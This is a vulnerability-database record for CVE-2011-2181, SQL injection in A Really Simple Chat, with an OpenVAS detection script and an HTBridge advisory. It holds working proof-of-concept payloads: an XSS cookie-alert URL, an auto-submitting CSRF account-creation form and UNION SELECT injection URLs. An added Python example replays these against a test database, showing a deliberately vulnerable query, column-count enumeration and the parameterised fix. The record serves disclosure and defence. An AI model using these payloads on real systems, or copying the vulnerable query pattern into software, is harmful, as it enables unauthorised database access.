ID CVE-2011-2181 Type cve Reporter cve@mitre.org Modified 2011-06-30T04:00:00
Description
Multiple SQL injection vulnerabilities in A Really Simple Chat (ARSC) 3.3-rc2 allow remote attackers to execute arbitrary SQL commands via the (1) arsc_user parameter to base/admin/edit_user.php, (2) arsc_layout_id parameter in base/admin/edit_layout.php, or (3) arsc_room parameter to base/admin/edit_room.php.
{"openvas": [{"lastseen": "2020-05-08T19:10:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2181"], "description": "The host is running A Really Simple Chat and is prone to multiple\n SQL injection vulnerabilities.", "modified": "2020-05-06T00:00:00", "published": "2011-07-05T00:00:00", "id": "OPENVAS:1361412562310902608", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902608", "type": "openvas", "title": "A Really Simple Chat Multiple SQL Injection Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# A Really Simple Chat Multiple SQL Injection Vulnerabilities\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902608\");\n script_version(\"2020-05-06T13:14:18+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 13:14:18 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-07-05 13:15:06 +0200 (Tue, 05 Jul 2011)\");\n script_cve_id(\"CVE-2011-2181\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"A Really Simple Chat Multiple SQL Injection Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2011/06/02/7\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2011/06/02/1\");\n script_xref(name:\"URL\", value:\"http://www.htbridge.ch/advisory/multiple_sql_injections_in_a_really_simple_chat_arsc.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to alter queries to\n the SQL database, execute arbitrary queries to the database, compromise the\n application, access or modify sensitive data.\");\n\n script_tag(name:\"affected\", value:\"A Really Simple Chat version 3.3-rc2.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to improper 
validation of user supplied data\n to 'arsc_user parameter' in edit_user.php, 'arsc_layout_id' parameter in\n edit_layout.php and 'arsc_room' parameter in edit_room.php, which allows\n attacker to execute arbitrary SQL commands.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"The host is running A Really Simple Chat and is prone to multiple\n SQL injection vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port(default:80);\n\nif(!http_can_host_php(port:port)){\n exit(0);\n}\n\nforeach dir (make_list_unique(\"/arsc\", \"/chat\", \"/\", http_cgi_dirs(port:port)))\n{\n\n if(dir == \"/\") dir = \"\";\n\n res = http_get_cache(item:dir + \"/base/index.php\", port:port);\n if(\"Powered by ARSC\" >< res && \"v3.3-rc2\" >< res)\n {\n security_message(port:port);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "htbridge": [{"lastseen": "2020-12-24T11:32:23", "bulletinFamily": "software", "cvelist": ["CVE-2011-2180", "CVE-2011-2181"], "description": "High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in A Really Simple Chat (ARSC) which could be exploited to perform cross-site scripting, cross-site request forgery and SQL injection attacks. \n \n1) Cross-site scripting (XSS) vulnerability in A Really Simple Chat (ARSC): CVE-2011-2180 \n1.1 The vulnerability exists due to input sanitation error in the \"arsc_link\" parameter in dereferer.php. 
A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user's browser in context of the vulnerable website. \nExploitation example: \nhttp://[host]/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n2) Cross-site request forgery (CSRF) vulnerabilities in A Really Simple Chat (ARSC) \n2.1 The vulnerability exists due to insufficient validation of the request origin in base/admin/add_user.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and create arbitrary accounts. \nExploitation example: \n<form action=\"http://[host]/base/admin/add_user.php\" method=\"post\" name=\"main\" /> \n<input name=\"arsc_newuser\" value=\"test\" type=\"hidden\" /> \n<input type=\"submit\" id=\"btn\" name=\"submit\" value=\"Submit \u203a\u203a\"> \n</form> \n<script> \ndocument.getElementById('btn').click(); \n</script> \n \n3) SQL injection weakness in A Really Simple Chat (ARSC): CVE-2011-2181 \nThe weakness exists due to input sanitation errors in the \"arsc_user\" parameter in base/admin/edit_user.php, in the \"arsc_layout_id\" parameter in base/admin/edit_layout.php and in the \"arsc_room\" parameter in base/admin/edit_room.php. A remote user with administrative privileges can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application's database. Combined with vulnerability #2 it is possible for a remote attacker to create an administrative account and then use it to exploit this weakness. \nExploitation examples: \nhttp://[host]/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202 \nhttp://[host]/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 \nhttp://[host]/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202 \n\n", "modified": "2011-05-12T00:00:00", "published": "2011-05-12T00:00:00", "id": "HTB22997", "href": "https://www.htbridge.com/advisory/HTB22997", "type": "htbridge", "title": "Multiple Vulnerabilities in A Really Simple Chat (ARSC)", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P/"}}]}
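Worked example, added to this record and not taken from ARSC or from the HTBridge advisory: the three proof-of-concept URLs above are replayed against an in-memory SQLite database whose tables are built to the shapes the payloads imply (a 15-, 20- and 7-column SELECT; arsc_user and arsc_room pasted inside a string literal, arsc_layout_id pasted bare). ARSC's real tables, column names and SQL are not on this page, so the schema, the query templates, the host placeholder example.invalid and the swap of MySQL's version() for SQLite's sqlite_version() are all assumptions made here. The block shows why each UNION needs exactly that many columns, how the count is found, and that a bound parameter (with an integer cast on the numeric key) stops all three payloads.

```python
"""Worked example for CVE-2011-2181 (added here; not ARSC or HTBridge code).

Models the query shapes implied by the three HTBridge proof-of-concept URLs against an
in-memory SQLite database: the admin page pastes the request parameter into its SQL, so
a UNION SELECT with the right column count appends attacker-chosen rows to the result.
ARSC's real tables, columns and SQL are not on the page; everything below is a
constructed assumption that reproduces the behaviour the advisory describes.
"""
import sqlite3
from urllib.parse import parse_qs, urlsplit

SQLITE_VERSION = sqlite3.sqlite_version  # what sqlite_version() returns locally

# The PoC URLs quoted in the advisory, with "[host]" replaced by a placeholder so they parse.
POC_URLS = {
    "arsc_user": ("http://example.invalid/base/admin/edit_user.php?arsc_user="
                  "-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202"),
    "arsc_layout_id": ("http://example.invalid/base/admin/edit_layout.php?arsc_layout_id="
                       "-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20"),
    "arsc_room": ("http://example.invalid/base/admin/edit_room.php?arsc_room="
                  "%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202"),
}

# Assumed target per parameter: (table, column count, whether the key is quoted in the SQL).
# The counts are what the PoCs' UNIONs require (15, 20 and 7); the quoting follows the
# payloads (arsc_user and arsc_room close a string literal, arsc_layout_id is pasted bare).
TARGETS = {
    "arsc_user": ("arsc_user", 15, True),
    "arsc_layout_id": ("arsc_layout", 20, False),
    "arsc_room": ("arsc_room", 7, True),
}


def poc_value(param, url):
    """Pull the decoded parameter value out of a PoC URL."""
    return parse_qs(urlsplit(url).query)[param][0]


def to_sqlite(payload):
    """MySQL's version() has no SQLite counterpart; swap in sqlite_version() so the
    otherwise unchanged payload can be exercised locally."""
    return payload.replace("version()", "sqlite_version()")


def build_db():
    """Constructed schema: one table per target, keyed by a column named after the parameter."""
    con = sqlite3.connect(":memory:")
    for param, (table, ncols, quoted) in TARGETS.items():
        cols = [param] + [f"c{i}" for i in range(2, ncols + 1)]
        con.execute(f"CREATE TABLE {table} ({', '.join(cols)})")
        row = ["admin" if quoted else 1] + [f"v{i}" for i in range(2, ncols + 1)]
        con.execute(f"INSERT INTO {table} VALUES ({', '.join('?' * ncols)})", row)
    return con


def vulnerable_lookup(con, param, value):
    """The defect the advisory describes: the parameter is interpolated into the SQL text."""
    table, _, quoted = TARGETS[param]
    literal = f"'{value}'" if quoted else value
    return con.execute(f"SELECT * FROM {table} WHERE {param} = {literal}").fetchall()


def safe_lookup(con, param, value):
    """Hardened form: a bound parameter is only ever compared, never parsed as SQL, and the
    numeric key is coerced first so a non-integer payload is rejected outright."""
    table, _, quoted = TARGETS[param]
    if not quoted:
        value = int(value)  # raises ValueError on "-1 union select ..."
    return con.execute(f"SELECT * FROM {table} WHERE {param} = ?", (value,)).fetchall()


def enumerate_columns(con, param, limit=32):
    """How the PoC column counts are found: grow a UNION of NULLs until the database stops
    rejecting the column-count mismatch.  Against a live target the same signal is an error
    page or a differing response rather than the exception caught here."""
    _, _, quoted = TARGETS[param]
    for n in range(1, limit + 1):
        probe = ("-1' union select " if quoted else "-1 union select ") + ",".join(["NULL"] * n)
        if quoted:
            probe += " -- "
        try:
            vulnerable_lookup(con, param, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def run_poc(param):
    """Replay one advisory PoC through both query styles; returns (leaked rows, safe rows)."""
    con = build_db()
    payload = to_sqlite(poc_value(param, POC_URLS[param]))
    leaked = vulnerable_lookup(con, param, payload)
    try:
        safe = safe_lookup(con, param, payload)
    except ValueError:
        safe = []
    return leaked, safe


if __name__ == "__main__":
    for p in TARGETS:
        leaked, safe = run_poc(p)
        print(f"{p}: columns={enumerate_columns(build_db(), p)} "
              f"vulnerable -> {leaked[0]!r}; parameterised -> {safe!r}")
```

Two points worth taking from the run. The arsc_layout_id payload carries no %27 at all: the value is numeric in the query, so quote-escaping alone (the usual first reaction to a SQL injection report) would not have closed that path; only binding the value, or casting it to an integer before use, does. And the exploit's precondition is unchanged by the fix being demonstrated: the three scripts sit under base/admin/, so the database access requires an administrator session, which is why the HTBridge entry scores this Au:S and chains it with the add_user.php CSRF, while the OpenVAS entry scores the same CVE Au:N.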